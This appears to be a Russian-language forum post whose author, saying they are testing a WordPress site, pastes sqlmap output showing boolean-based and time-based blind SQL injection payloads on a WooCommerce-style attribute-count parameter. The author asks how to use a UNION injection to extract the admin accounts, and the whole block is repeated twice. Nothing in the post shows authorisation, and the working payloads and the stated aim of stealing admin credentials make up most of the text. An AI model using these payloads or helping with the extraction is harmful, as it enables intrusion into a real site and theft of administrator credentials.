Всем привет! Тестирую сайт, на Wordpress. Использую инструмент sqlmap. Нашел две точки:
Parameter: calculate_attribute_counts[][taxonomy] (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: calculate_attribute_counts[][taxonomy]=-7087") OR 6781=6781#&calculate_attribute_counts[][query_type]=and
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: calculate_attribute_counts[][taxonomy]=INJECTION") AND (SELECT 8995 FROM (SELECT(SLEEP(5)))YxVN) AND ("CdLH"="CdLH&calculate_attribute_counts[][query_type]=and
Так же инструмент обнаружил
[20:14:38] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found, но ничего не находит. Мне точно известно, что есть точка внедрения UNION, через эту точку возможно вытащить учетные записи админа при помощи эксплойта. Подскажите как сделать это с SQLMAP.
Parameter: calculate_attribute_counts[][taxonomy] (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: calculate_attribute_counts[][taxonomy]=-7087") OR 6781=6781#&calculate_attribute_counts[][query_type]=and
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: calculate_attribute_counts[][taxonomy]=INJECTION") AND (SELECT 8995 FROM (SELECT(SLEEP(5)))YxVN) AND ("CdLH"="CdLH&calculate_attribute_counts[][query_type]=and
Так же инструмент обнаружил
[20:14:38] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found, но ничего не находит. Мне точно известно, что есть точка внедрения UNION, через эту точку возможно вытащить учетные записи админа при помощи эксплойта. Подскажите как сделать это с SQLMAP.